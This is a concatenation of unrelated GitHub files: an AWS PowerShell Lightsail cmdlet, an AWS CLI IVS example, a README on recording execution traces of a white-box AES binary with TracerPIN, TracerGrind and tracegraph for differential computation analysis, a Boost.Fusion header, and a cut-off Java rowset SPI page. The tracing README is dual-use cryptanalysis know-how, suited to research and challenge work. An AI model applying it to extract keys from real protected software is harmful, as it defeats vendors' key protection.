"This cmdlet returns a collection of Amazon.Lightsail.Model.Operation objects.",
"The service call response (type Amazon.Lightsail.Model.CopySnapshotResponse) can also be referenced from properties attached to the cmdlet entry in the $AWSHistory stack."
)]
public partial class CopyLSSnapshotCmdlet : AmazonLightsailClientCmdlet, IExecutor
{
#region Parameter RestoreDate
/// <summary>
/// <para>
/// <para>The date of the source automatic snapshot to copy. Use the <code>get auto snapshots</code>
/// operation to identify the dates of the available automatic snapshots.</para><para>Constraints:</para><ul><li><para>Must be specified in <code>YYYY-MM-DD</code> format.</para></li><li><para>This parameter cannot be defined together with the <code>use latest restorable auto
/// snapshot</code> parameter. The <code>restore date</code> and <code>use latest restorable
/// auto snapshot</code> parameters are mutually exclusive.</para></li><li><para>Define this parameter only when copying an automatic snapshot as a manual snapshot.
/// For more information, see the <a href="https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-keeping-automatic-snapshots">Lightsail
/// Dev Guide</a>.</para></li></ul>
/// </para>
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public System.String RestoreDate { get; set; }
#endregion
#region Parameter SourceRegion
/// <summary>
/// <para>
/// <para>The AWS Region where the source manual or automatic snapshot is located.</para>
/// </para>
/// </summary>
#if !MODULAR
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
#else
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true, Mandatory = true)]
[System.Management.Automation.AllowNull]
#endif
[Amazon.PowerShell.Common.AWSRequiredParameter]
[AWSConstantClassSource("Amazon.Lightsail.RegionName")]
public Amazon.Lightsail.RegionName SourceRegion { get; set; }
#endregion
#region Parameter SourceResourceName
/// <summary>
/// <para>
/// <para>The name of the source instance or disk from which the source automatic snapshot was
/// created.</para><para>Constraint:</para><ul><li><para>Define this parameter only when copying an automatic snapshot as a manual snapshot.
/// For more information, see the <a href="https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-keeping-automatic-snapshots">Lightsail
/// Dev Guide</a>.</para></li></ul>
/// </para>
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public System.String SourceResourceName { get; set; }
#endregion
#region Parameter SourceSnapshotName
/// <summary>
/// <para>
/// <para>The name of the source manual snapshot to copy.</para><para>Constraint:</para><ul><li><para>Define this parameter only when copying a manual snapshot as another manual snapshot.</para></li></ul>
/// </para>
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public System.String SourceSnapshotName { get; set; }
#endregion
#region Parameter TargetSnapshotName
/// <summary>
/// <para>
/// <para>The name of the new manual snapshot to be created as a copy.</para>
/// </para>
/// </summary>
#if !MODULAR
[System.Management.Automation.Parameter(Position = 0, ValueFromPipelineByPropertyName = true, ValueFromPipeline = true)]
#else
[System.Management.Automation.Parameter(Position = 0, ValueFromPipelineByPropertyName = true, ValueFromPipeline = true, Mandatory = true)]
[System.Management.Automation.AllowEmptyString]
[System.Management.Automation.AllowNull]
#endif
[Amazon.PowerShell.Common.AWSRequiredParameter]
public System.String TargetSnapshotName { get; set; }
#endregion
#region Parameter UseLatestRestorableAutoSnapshot
/// <summary>
/// <para>
/// <para>A Boolean value to indicate whether to use the latest available automatic snapshot
/// of the specified source instance or disk.</para><para>Constraints:</para><ul><li><para>This parameter cannot be defined together with the <code>restore date</code> parameter.
/// The <code>use latest restorable auto snapshot</code> and <code>restore date</code>
/// parameters are mutually exclusive.</para></li><li><para>Define this parameter only when copying an automatic snapshot as a manual snapshot.
/// For more information, see the <a href="https://lightsail.aws.amazon.com/ls/docs/en_us/articles/amazon-lightsail-keeping-automatic-snapshots">Lightsail
/// Dev Guide</a>.</para></li></ul>
/// </para>
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public System.Boolean? UseLatestRestorableAutoSnapshot { get; set; }
#endregion
#region Parameter Select
/// <summary>
/// Use the -Select parameter to control the cmdlet output. The default value is 'Operations'.
/// Specifying -Select '*' will result in the cmdlet returning the whole service response (Amazon.Lightsail.Model.CopySnapshotResponse).
/// Specifying the name of a property of type Amazon.Lightsail.Model.CopySnapshotResponse will result in that property being returned.
/// Specifying -Select '^ParameterName' will result in the cmdlet returning the selected cmdlet parameter value.
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public string Select { get; set; } = "Operations";
#endregion
#region Parameter PassThru
/// <summary>
/// Changes the cmdlet behavior to return the value passed to the TargetSnapshotName parameter.
/// The -PassThru parameter is deprecated, use -Select '^TargetSnapshotName' instead. This parameter will be removed in a future version.
/// </summary>
[System.Obsolete("The -PassThru parameter is deprecated, use -Select '^TargetSnapshotName' instead. This parameter will be removed in a future version.")]
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public SwitchParameter PassThru { get; set; }
#endregion
#region Parameter Force
/// <summary>
/// This parameter overrides confirmation prompts to force
/// the cmdlet to continue its operation. This parameter should always
/// be used with caution.
/// </summary>
[System.Management.Automation.Parameter(ValueFromPipelineByPropertyName = true)]
public SwitchParameter Force { get; set; }
#endregion
protected override void ProcessRecord()
{
base.ProcessRecord();
var resourceIdentifiersText = FormatParameterValuesForConfirmationMsg(nameof(this.TargetSnapshotName), MyInvocation.BoundParameters);
if (!ConfirmShouldProceed(this.Force.IsPresent, resourceIdentifiersText, "Copy-LSSnapshot (CopySnapshot)"))
{
return;
}
var context = new CmdletContext();
// allow for manipulation of parameters prior to loading into context
PreExecutionContextLoad(context);
#pragma warning disable CS0618, CS0612 //A class member was marked with the Obsolete attribute
if (ParameterWasBound(nameof(this.Select)))
{
context.Select = CreateSelectDelegate<Amazon.Lightsail.Model.CopySnapshotResponse, CopyLSSnapshotCmdlet>(Select) ??
throw new System.ArgumentException("Invalid value for -Select parameter.", nameof(this.Select));
if (this.PassThru.IsPresent)
{
throw new System.ArgumentException("-PassThru cannot be used when -Select is specified.", nameof(this.Select));
}
}
else if (this.PassThru.IsPresent)
{
context.Select = (response, cmdlet) => this.TargetSnapshotName;
}
#pragma warning restore CS0618, CS0612 //A class member was marked with the Obsolete attribute
context.RestoreDate = this.RestoreDate;
context.SourceRegion = this.SourceRegion;
#if MODULAR
if (this.SourceRegion == null && ParameterWasBound(nameof(this.SourceRegion)))
{
WriteWarning("You are passing $null as a value for parameter SourceRegion which is marked as required. In case you believe this parameter was incorrectly marked as required, report this by opening an issue at https://github.com/aws/aws-tools-for-powershell/issues.");
}
#endif
context.SourceResourceName = this.SourceResourceName;
context.SourceSnapshotName = this.SourceSnapshotName;
context.TargetSnapshotName = this.TargetSnapshotName;
#if MODULAR
if (this.TargetSnapshotName == null && ParameterWasBound(nameof(this.TargetSnapshotName)))
{
WriteWarning("You are passing $null as a value for parameter TargetSnapshotName which is marked as required. In case you believe this parameter was incorrectly marked as required, report this by opening an issue at https://github.com/aws/aws-tools-for-powershell/issues.");
}
#endif
context.UseLatestRestorableAutoSnapshot = this.UseLatestRestorableAutoSnapshot;
// allow further manipulation of loaded context prior to processing
PostExecutionContextLoad(context);
var output = Execute(context) as CmdletOutput;
ProcessOutput(output);
}
#region IExecutor Members
public object Execute(ExecutorContext context)
{
var cmdletContext = context as CmdletContext;
// create request
var request = new Amazon.Lightsail.Model.CopySnapshotRequest();
if (cmdletContext.RestoreDate != null)
{
request.RestoreDate = cmdletContext.RestoreDate;
}
if (cmdletContext.SourceRegion != null)
{
request.SourceRegion = cmdletContext.SourceRegion;
}
if (cmdletContext.SourceResourceName != null)
{
request.SourceResourceName = cmdletContext.SourceResourceName;
}
if (cmdletContext.SourceSnapshotName != null)
{
request.SourceSnapshotName = cmdletContext.SourceSnapshotName;
}
if (cmdletContext.TargetSnapshotName != null)
{
request.TargetSnapshotName = cmdletContext.TargetSnapshotName;
}
if (cmdletContext.UseLatestRestorableAutoSnapshot != null)
{
request.UseLatestRestorableAutoSnapshot = cmdletContext.UseLatestRestorableAutoSnapshot.Value;
}
CmdletOutput output;
// issue call
var client = Client ?? CreateClient(_CurrentCredentials, _RegionEndpoint);
try
{
var response = CallAWSServiceOperation(client, request);
object pipelineOutput = null;
pipelineOutput = cmdletContext.Select(response, this);
output = new CmdletOutput
{
PipelineOutput = pipelineOutput,
ServiceResponse = response
};
}
catch (Exception e)
{
output = new CmdletOutput { ErrorResponse = e };
}
return output;
}
public ExecutorContext CreateContext()
{
return new CmdletContext();
}
#endregion
#region AWS Service Operation Call
private Amazon.Lightsail.Model.CopySnapshotResponse CallAWSServiceOperation(IAmazonLightsail client, Amazon.Lightsail.Model.CopySnapshotRequest request)
{
Utils.Common.WriteVerboseEndpointMessage(this, client.Config, "Amazon Lightsail", "CopySnapshot");
try
{
#if DESKTOP
return client.CopySnapshot(request);
#elif CORECLR
return client.CopySnapshotAsync(request).GetAwaiter().GetResult();
#else
#error "Unknown build edition"
#endif
}
catch (AmazonServiceException exc)
{
var webException = exc.InnerException as System.Net.WebException;
if (webException != null)
{
throw new Exception(Utils.Common.FormatNameResolutionFailureMessage(client.Config, webException.Message), webException);
}
throw;
}
}
#endregion
internal partial class CmdletContext : ExecutorContext
{
public System.String RestoreDate { get; set; }
public Amazon.Lightsail.RegionName SourceRegion { get; set; }
public System.String SourceResourceName { get; set; }
public System.String SourceSnapshotName { get; set; }
public System.String TargetSnapshotName { get; set; }
public System.Boolean? UseLatestRestorableAutoSnapshot { get; set; }
public System.Func<Amazon.Lightsail.Model.CopySnapshotResponse, CopyLSSnapshotCmdlet, object> Select { get; set; } =
(response, cmdlet) => response.Operations;
}
}
}
| {
"pile_set_name": "Github"
} |
**To get channel configuration information about multiple channels**
The following ``batch-get-channel`` example lists information about the specified channels. ::
aws ivs batch-get-channel \
--arns arn:aws:ivs:us-west-2:123456789012:channel/abcdABCDefgh \
arn:aws:ivs:us-west-2:123456789012:channel/ijklMNOPqrst
Output::
{
"channels": [
{
"arn": "arn:aws:ivs:us-west-2:123456789012:channel/abcdABCDefgh",
"name": "channel-1",
"latencyMode": "LOW",
"ingestEndpoint": "a1b2c3d4e5f6.global-contribute.live-video.net",
"playbackUrl": "https://a1b2c3d4e5f6.us-west-2.playback.live-video.net/api/video/v1/us-west-2.123456789012.channel.abcdEFGH.m3u8",
"tags": {}
},
{
"arn": "arn:aws:ivs:us-west-2:123456789012:channel/abcdABCDefgh",
"name": "channel-2",
"latencyMode": "LOW",
"ingestEndpoint": "a1b2c3d4e5f6.global-contribute.live-video.net",
"playbackUrl": "https://a1b2c3d4e5f6.us-west-2.playback.live-video.net/api/video/v1/us-west-2.123456789012.channel.abcdEFGH.m3u8",
"tags": {}
}
]
}
For more information, see `Create a Channel <https://docs.aws.amazon.com/ivs/latest/userguide/GSIVS-create-channel.html>`__ in the *Amazon Interactive Video Service User Guide*. | {
"pile_set_name": "Github"
} |
## Usage
## Acquiring one trace with TracerPIN
```bash
Tracer -t sqlite -- ../target/encryptECB -key ../target/key.txt -in <(echo 000102030405060708090a0b0c0d0e0f|xxd -r -p) -out >(xxd -p)
```
The program exits too early for an unknown reason, so we'll switch to TracerGrind.
## Acquiring one trace with TracerGrind
By default TracerGrind traces everything, so let's find the address range of the main executable and apply an address filter.
```bash
objdump -p ../target/encryptECB |grep -A1 LOAD|grep -B1 "r.x"
LOAD off 0x0000000000000000 vaddr 0x0000000000400000 paddr 0x0000000000400000 align 2**12
filesz 0x00000000000e3810 memsz 0x00000000000e3810 flags r-x
valgrind --tool=tracergrind --filter=0x400000-0x500000 --output=xiaolai.trace ../target/encryptECB -key ../target/key.txt -in <(echo 000102030405060708090a0b0c0d0e0f|xxd -r -p) -out >(xxd -p)
sqlitetrace xiaolai.trace xiaolai.sqlite
```
The resulting sqlite trace is about 500 MB.
## Visualizing
Just fire up tracegraph and load the sqlite trace:
```
tracegraph xiaolai.sqlite &
```
We may guess that the AES is located at the bottom, where we see 10 successive large data reads.
Instructions are localized in several columns, so for DCA we'll have to try each column:
* 0x40e2fe-0x40f025
* 0x43b12f-0x43b2ba
* 0x4755ba-0x475c90
* 0x4bcc50-0x4bd367
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2001-2011 Joel de Guzman
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==============================================================================*/
#if !defined(FUSION_INSERT_10022005_1837)
#define FUSION_INSERT_10022005_1837
#include <boost/fusion/support/config.hpp>
#include <boost/mpl/insert.hpp>
#include <boost/fusion/support/tag_of.hpp>
#include <boost/fusion/algorithm/transformation/insert.hpp>
#include <boost/fusion/sequence/convert.hpp>
namespace boost { namespace mpl
{
template <typename Tag>
struct insert_impl;
template <>
struct insert_impl<fusion::fusion_sequence_tag>
{
template <typename Sequence, typename Pos, typename T>
struct apply
{
typedef typename
fusion::result_of::insert<Sequence, Pos, T>::type
result;
typedef typename
fusion::result_of::convert<
typename fusion::detail::tag_of<Sequence>::type, result>::type
type;
};
};
}}
#endif
| {
"pile_set_name": "Github"
} |
<!DOCTYPE doctype PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<meta name="GENERATOR"
content="Mozilla/4.79 [en] (Windows NT 5.0; U) [Netscape]">
<!--
Copyright (c) 2003, 2010, Oracle and/or its affiliates. All rights reserved.
DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
This code is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License version 2 only, as
published by the Free Software Foundation. Oracle designates this
particular file as subject to the "Classpath" exception as provided
by Oracle in the LICENSE file that accompanied this code.
This code is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
version 2 for more details (a copy is included in the LICENSE file that
accompanied this code).
You should have received a copy of the GNU General Public License version
2 along with this work; if not, write to the Free Software Foundation,
Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
or visit www.oracle.com if you need additional information or have any
questions.
-->
<title>javax.sql.rowset.spi</title>
</head>
<body bgcolor="#ffffff">
The standard classes and interfaces that a third party vendor has to
use in its implementation of a synchronization provider. These classes and
interfaces are referred to as the Service Provider Interface (SPI). A vendor may
have its implementation included on the JDBC web page that lists available
<code>SyncProvider</code> implementations by sending email to <code>[email protected]</code>.
Doing this helps make developers aware of the implementation. To make it possible
for a <code>RowSet</code> object to use an implementation, the vendor must register
it with the <code>SyncFactory</code> singleton. (See the class comment for
<code>SyncProvider</code> for a full explanation of the registration process and
the naming convention to be used.)
<P>
<h2>Table of Contents</h2>
<ul>
<li><a href="#pkgspec">1.0 Package Specification</a>
<li><a href="#arch">2.0 Service Provider Architecture</a>
<li><a href="#impl">3.0 Implementer's Guide</a>
<li><a href="#resolving">4.0 Resolving Synchronization Conflicts</a>
<li><a href="#relspec">5.0 Related Specifications</a>
<li><a href="#reldocs">6.0 Related Documentation</a>
</ul>
<h3><a name="pkgspec">1.0 Package Specification</h3>
<P>
The following classes and interfaces make up the <code>javax.sql.rowset.spi</code>
package:
<UL>
<LI><code>SyncFactory</code>
<LI><code>SyncProvider</code>
<LI><code>SyncFactoryException</code>
<LI><code>SyncProviderException</code>
<LI><code>SyncResolver</code>
<LI><code>XmlReader</code>
<LI><code>XmlWriter</code>
<LI><code>TransactionalWriter</code>
</UL>
The following interfaces, in the <code>javax.sql</code> package, are also part of the SPI:
<UL>
<LI><code>RowSetReader</code>
<LI><code>RowSetWriter</code>
</UL>
<P>
A <code>SyncProvider</code> implementation provides a disconnected <code>RowSet</code>
object with the mechanisms for reading data into it and for writing data that has been
modified in it
back to the underlying data source. A <i>reader</i>, a <code>RowSetReader</code> or
<code>XMLReader</code> object, reads data into a <code>RowSet</code> object when the
<code>CachedRowSet</code> methods <code>execute</code> or <code>populate</code>
are called. A <i>writer</i>, a <code>RowSetWriter</code> or <code>XMLWriter</code>
object, writes changes back to the underlying data source when the
<code>CachedRowSet</code> method <code>acceptChanges</code> is called.
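<P>
For example, a disconnected <code>CachedRowSet</code> object delegates to its provider's
reader when it is populated and to its provider's writer when <code>acceptChanges</code>
is called. The following sketch uses the reference implementation class
<code>CachedRowSetImpl</code>; the connection settings, table, and column names are
purely illustrative.
<PRE>
    CachedRowSet crs = new CachedRowSetImpl();
    crs.setUrl("jdbc:mydriver://localhost/mydb");   // illustrative connection settings
    crs.setUsername("user");
    crs.setPassword("pass");
    crs.setCommand("SELECT ID, NAME FROM EMPLOYEES");
    crs.execute();           // the provider's reader populates the rowset

    crs.absolute(1);
    crs.updateString("NAME", "Updated Name");
    crs.updateRow();

    crs.acceptChanges();     // the provider's writer synchronizes the changes
</PRE>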
<P>
The process of writing changes in a <code>RowSet</code> object to its data source
is known as <i>synchronization</i>. The <code>SyncProvider</code> implementation that a
<code>RowSet</code> object is using determines the level of synchronization that the
<code>RowSet</code> object's writer uses. The various levels of synchronization are
referred to as <i>grades</i>.
<P>
The lower grades of synchronization are
known as <i>optimistic</i> concurrency levels because they optimistically
assume that there will be no conflicts or very few conflicts. A conflict exists when
the same data modified in the <code>RowSet</code> object has also been modified
in the data source. Using the optimistic concurrency model means that if there
is a conflict, modifications to either the data source or the <code>RowSet</code>
object will be lost.
<P>
Higher grades of synchronization are called <i>pessimistic</i> because they assume
that others will be accessing the data source and making modifications. These
grades set varying levels of locks to increase the chances that no conflicts
occur.
<P>
The lowest level of synchronization is simply writing any changes made to the
<code>RowSet</code> object to its underlying data source. The writer does
nothing to check for conflicts.
If there is a conflict and the data
source values are overwritten, the changes other parties have made to the data
source are lost.
<P>
The <code>RIXMLProvider</code> implementation uses the lowest level
of synchronization and just writes <code>RowSet</code> changes to the data source.
This is true because typically XML data sources do not enable transaction
techniques for maintaining the integrity of data. However, specific standards
groups have considered offering XML-based synchronization. For details, see
<PRE>
<a href="http://www.syncml.org">http://www.syncml.org</a>
</PRE>
<P>
For the next level up, the
writer checks to see if there are any conflicts, and if there are,
it does not write anything to the data source. The problem with this concurrency
level is that if another party has modified the corresponding data in the data source
since the <code>RowSet</code> object got its data,
the changes made to the <code>RowSet</code> object are lost. The
<code>RIOptimisticProvider</code> implementation uses this level of synchronization.
<P>
At higher levels of synchronization, referred to as pessimistic concurrency,
the writer takes steps to avoid conflicts by setting locks. Setting locks
can vary from setting a lock on a single row to setting a lock on a table
or the entire data source. The level of synchronization is therefore a tradeoff
between the ability of users to access the data source concurrently and the ability
of the writer to keep the data in the <code>RowSet</code> object and its data source
synchronized.
<P>
It is a requirement that all disconnected <code>RowSet</code> objects
(<code>CachedRowSet</code>, <code>FilteredRowSet</code>, <code>JoinRowSet</code>,
and <code>WebRowSet</code> objects) obtain their <code>SyncProvider</code> objects
from the <code>SyncFactory</code> mechanism.
<P>
The reference implementation (RI) provides two synchronization providers.
<UL>
<LI><b><tt>RIOptimisticProvider</tt></b> <br>
The default provider that the <code>SyncFactory</code> instance will
supply to a disconnected <code>RowSet</code> object when no provider
implementation is specified.<BR>
This synchronization provider uses an optimistic concurrency model,
assuming that there will be few conflicts among users
who are accessing the same data in a database. It avoids
using locks; rather, it checks to see if there is a conflict
before trying to synchronize the <code>RowSet</code> object and the
data source. If there is a conflict, it does nothing, meaning that
changes to the <code>RowSet</code> object are not persisted to the data
source.
<LI><B><tt>RIXMLProvider</tt></B> <BR>
A synchronization provider that can be used with a
<code>WebRowSet</code> object, which is a rowset that can be written
in XML format or read from XML format. The
<code>RIXMLProvider</code> implementation does no checking at all for
conflicts and simply writes any updated data in the
<code>WebRowSet</code> object to the underlying data source.
<code>WebRowSet</code> objects use this provider when they are
dealing with XML data.
</UL>
These <code>SyncProvider</code> implementations
are bundled with the reference implementation, which makes them always available to
<code>RowSet</code> implementations.
<code>SyncProvider</code> implementations make themselves available by being
registered with the <code>SyncFactory</code> singleton. When a <code>RowSet</code>
object requests a provider, by specifying it in the constructor or as an argument to the
<code>CachedRowSet</code> method <code>setSyncProvider</code>,
the <code>SyncFactory</code> singleton
checks to see if the requested provider has been registered with it.
If it has, the <code>SyncFactory</code> creates an instance of it and passes it to the
requesting <code>RowSet</code> object.
If the <code>SyncProvider</code> implementation that is specified has not been registered,
the <code>SyncFactory</code> singleton causes a <code>SyncFactoryException</code> object
to be thrown. If no provider is specified,
the <code>SyncFactory</code> singleton will create an instance of the default
provider implementation, <code>RIOptimisticProvider</code>,
and pass it to the requesting <code>RowSet</code> object.
<P>
If a <code>WebRowSet</code> object does not specify a provider in its constructor, the
<code>SyncFactory</code> will give it an instance of <code>RIOptimisticProvider</code>.
However, the constructor for <code>WebRowSet</code> is implemented to set the provider
to the <code>RIXMLProvider</code>, which reads and writes a <code>RowSet</code> object
in XML format.
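<P>
For instance, a <code>WebRowSet</code> object created with its default constructor is
wired to the <code>RIXMLProvider</code> and can write its state as an XML document and
read it back later. A brief sketch, using the reference implementation class
<code>WebRowSetImpl</code> with an illustrative file name:
<PRE>
    WebRowSet wrs = new WebRowSetImpl();   // provider defaults to RIXMLProvider
    wrs.setCommand("SELECT ID, NAME FROM EMPLOYEES");
    wrs.setUrl("jdbc:mydriver://localhost/mydb");
    wrs.execute();

    // write the rowset, including its metadata and pending changes, as XML
    wrs.writeXml(new java.io.FileWriter("employees.xml"));

    // later, repopulate another WebRowSet object from the XML document
    WebRowSet copy = new WebRowSetImpl();
    copy.readXml(new java.io.FileReader("employees.xml"));
</PRE>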
<P>
See the <a href="SyncProvider.html">SyncProvider</a> class
specification for further details.
<p>
Vendors may develop a <tt>SyncProvider</tt> implementation with any one of the possible
levels of synchronization, thus giving <code>RowSet</code> objects a choice of
synchronization mechanisms. A vendor can make its implementation available by
registering the fully qualified class name with Oracle Corporation at
<code>[email protected]</code>. This process is discussed in further detail below.
<P>
<a name="arch"><h3>2.0 Service Provider Interface Architecture</h3>
<ul>
<b>2.1 Overview</b>
<p>
The Service Provider Interface provides a pluggable mechanism by which
<code>SyncProvider</code> implementations can be registered and then generated when
required. The lazy reference mechanism employed by the <code>SyncFactory</code> limits
unnecessary resource consumption by not creating an instance until it is
required by a disconnected
<code>RowSet</code> object. The <code>SyncFactory</code> class also provides
a standard API to configure logging options and streams that <b>may</b> be provided
by a particular <code>SyncProvider</code> implementation.
<p>
<b>2.2 Registering with the <code>SyncFactory</code></b>
<p>
A third party <code>SyncProvider</code> implementation must be registered with the
<code>SyncFactory</code> in order for a disconnected <code>RowSet</code> object
to obtain it and thereby use its <code>javax.sql.RowSetReader</code> and
<code>javax.sql.RowSetWriter</code>
implementations. The following registration mechanisms are available to all
<code>SyncProvider</code> implementations:
<ul>
<li><b>System properties</b> - Properties set at the command line. These
properties are set at run time and apply system-wide per invocation of the Java
application. See the section <a href="#reldocs">"Related Documentation"</a>
for further information.
<p>
<li><b>Property Files</b> - Properties specified in a standard property file.
This can be specified using a System Property or by modifying a standard
property file located in the platform run-time. The
reference implementation of this technology includes a standard property
file that can be edited to add additional <code>SyncProvider</code> objects.
<p>
<li><b>JNDI Context</b> - Available providers can be registered on a JNDI
context. The <tt>SyncFactory</tt> will attempt to load <tt>SyncProvider</tt>
objects bound to the context and register them with the factory. This
context must be supplied to the <code>SyncFactory</code> for the mechanism to
function correctly.
</ul>
<p>
Details on how to specify the system properties or properties in a property file
and how to configure the JNDI Context are explained in detail in the
<a href="SyncFactory.html"><code>SyncFactory</code></a> class description.
<p>
<b>2.3 SyncFactory Provider Instance Generation Policies</b>
<p>
The <code>SyncFactory</code> generates a requested <code>SyncProvider</code>
object if the provider has been correctly registered. The
following policies are adhered to when either a disconnected <code>RowSet</code> object
is instantiated with a specified <code>SyncProvider</code> implementation or is
reconfigured at runtime with an alternative <code>SyncProvider</code> object.
<ul>
<li> If a <code>SyncProvider</code> object is specified and the <code>SyncFactory</code>
contains <i>no</i> reference to the provider, a <code>SyncFactoryException</code> is
thrown.
<p>
<li> If a <code>SyncProvider</code> object is specified and the <code>SyncFactory</code>
contains a reference to the provider, the requested provider is supplied.
<p>
<li> If no <code>SyncProvider</code> object is specified, the reference
implementation provider <code>RIOptimisticProvider</code> is supplied.
</ul>
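<p>
The following sketch illustrates these policies; the provider class names are
illustrative.
<PRE>
    // requesting a provider the factory has no reference to
    try {
        SyncProvider unknown = SyncFactory.getInstance("com.acme.UnknownProvider");
    } catch (SyncFactoryException sfe) {
        // handle the unavailable provider
    }

    // requesting a provider that has been registered
    SyncFactory.registerProvider("com.foo.bar.HASyncProvider");
    SyncProvider ha = SyncFactory.getInstance("com.foo.bar.HASyncProvider");

    // specifying no provider: the RIOptimisticProvider is supplied
    CachedRowSet crs = new CachedRowSetImpl();
    SyncProvider def = crs.getSyncProvider();
</PRE>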
<p>
These policies are explored in more detail in the <a href="SyncFactory.html">
<code>SyncFactory</code></a> class.
</ul>
<li><a name="impl"><h3>3.0 SyncProvider Implementer's Guide</h3>
<ul>
<b>3.1 Requirements</b>
<p>
A compliant <code>SyncProvider</code> implementation that is fully pluggable
into the <code>SyncFactory</code> <b>must</b> extend and implement all
abstract methods in the <a href="SyncProvider.html"><code>SyncProvider</code></a>
class. In addition, an implementation <b>must</b> determine the
grade, locking and updatable view capabilities defined in the
<code>SyncProvider</code> class definition. One or more of the
<code>SyncProvider</code> description criteria <b>must</b> be supported. It
is expected that vendor implementations will offer a range of grade, locking, and
updatable view capabilities.
<p>
Furthermore, the <code>SyncProvider</code> naming convention <b>must</b> be followed as
detailed in the <a href="SyncProvider.html"><code>SyncProvider</code></a> class
description.
<p>
<b>3.2 Grades</b>
<p>
JSR 114 defines a set of grades to describe the quality of synchronization
a <code>SyncProvider</code> object can offer a disconnected <code>RowSet</code>
object. These grades are listed from the lowest quality of service to the highest.
<ul>
<li><b>GRADE_NONE</b> - No synchronization with the originating data source is
provided. A <code>SyncProvider</code> implementation returning this grade will simply
attempt to write any data that has changed in the <code>RowSet</code> object to the
underlying data source, overwriting whatever is there. No attempt is made to compare
original values with current values to see if there is a conflict. The
<code>RIXMLProvider</code> is implemented with this grade.
<p>
<li><b>GRADE_CHECK_MODIFIED_AT_COMMIT</b> - A low grade of optimistic synchronization.
A <code>SyncProvider</code> implementation returning this grade
will check for conflicts in rows that have changed between the last synchronization
and the current synchronization under way. Any changes in the originating data source
that have been modified will not be reflected in the disconnected <code>RowSet</code>
object. If there are no conflicts, changes in the <code>RowSet</code> object will be
written to the data source. If there are conflicts, no changes are written.
The <code>RIOptimisticProvider</code> implementation uses this grade.
<p>
<li><b>GRADE_CHECK_ALL_AT_COMMIT</b> - A high grade of optimistic synchronization.
A <code>SyncProvider</code> implementation returning this grade
will check all rows, including rows that have not changed in the disconnected
<code>RowSet</code> object. In this way, any changes to rows in the underlying
data source will be reflected in the disconnected <code>RowSet</code> object
when the synchronization finishes successfully.
<p>
<li><b>GRADE_LOCK_WHEN_MODIFIED</b> - A pessimistic grade of synchronization.
<code>SyncProvider</code> implementations returning this grade will lock
the row in the originating data source that corresponds to the row being changed
in the <code>RowSet</code> object to reduce the possibility of other
processes modifying the same data in the data source.
<p>
<li><b>GRADE_LOCK_WHEN_LOADED</b> - A higher pessimistic synchronization grade.
A <code>SyncProvider</code> implementation returning this grade will lock
the entire view and/or table affected by the original query used to
populate a <code>RowSet</code> object.
</ul>
<p>
<b>3.3 Locks</b>
<p>
JSR 114 defines a set of constants that specify whether any locks have been
placed on a <code>RowSet</code> object's underlying data source and, if so,
on which constructs the locks are placed. These locks will remain on the data
source while the <code>RowSet</code> object is disconnected from the data source.
<P>
These constants <b>should</b> be considered complementary to the
grade constants. The default setting for the majority of grade settings requires
that no data source locks remain when a <code>RowSet</code> object is disconnected
from its data source.
The grades <code>GRADE_LOCK_WHEN_MODIFIED</code> and
<code>GRADE_LOCK_WHEN_LOADED</code> allow a disconnected <code>RowSet</code> object
to have a fine-grained control over the degree of locking.
<ul>
<li><b>DATASOURCE_NO_LOCK</b> - No locks remain on the originating data source.
This is the default lock setting for all <code>SyncProvider</code> implementations
unless otherwise directed by a <code>RowSet</code> object.
<p>
<li><b>DATASOURCE_ROW_LOCK</b> - A lock is placed on the rows that are touched by
the original SQL query used to populate the <code>RowSet</code> object.
<p>
<li><b>DATASOURCE_TABLE_LOCK</b> - A lock is placed on all tables that are touched
by the query that was used to populate the <code>RowSet</code> object.
<p>
<li><b>DATASOURCE_DB_LOCK</b> - A lock is placed on the entire data source that is used
by the <code>RowSet</code> object.
</ul>
<p>
<b>3.4 Updatable Views</b>
<p>
A <code>RowSet</code> object may be populated with data from an SQL <code>VIEW</code>.
The following constants indicate whether a <code>SyncProvider</code> object can
update data in the table or tables from which the <code>VIEW</code> was derived.
<ul>
<li><b>UPDATABLE_VIEW_SYNC</b>
Indicates that a <code>SyncProvider</code> implementation supports synchronization
to the table or tables from which the SQL <code>VIEW</code> used to populate
a <code>RowSet</code> object is derived.
<p>
<li><b>NONUPDATABLE_VIEW_SYNC</b>
Indicates that a <code>SyncProvider</code> implementation does <b>not</b> support
synchronization to the table or tables from which the SQL <code>VIEW</code>
used to populate a <code>RowSet</code> object is derived.
</ul>
<p>
<b>3.5 Usage of <code>SyncProvider</code> Grading and Locking</b>
<p>
In the example below, the reference <tt>CachedRowSetImpl</tt> implementation
reconfigures its current <tt>SyncProvider</tt> object by calling the
<tt>setSyncProvider</tt> method.<br>
<PRE>
CachedRowSetImpl crs = new CachedRowSetImpl();
crs.setSyncProvider("com.foo.bar.HASyncProvider");
</PRE>
An application can retrieve the <tt>SyncProvider</tt> object currently in use
by a disconnected <code>RowSet</code> object. It can also retrieve the
grade of synchronization with which the provider was implemented and the degree of
locking currently in use. In addition, an application has the flexibility to set
the degree of locking to be used, which can increase the possibilities for successful
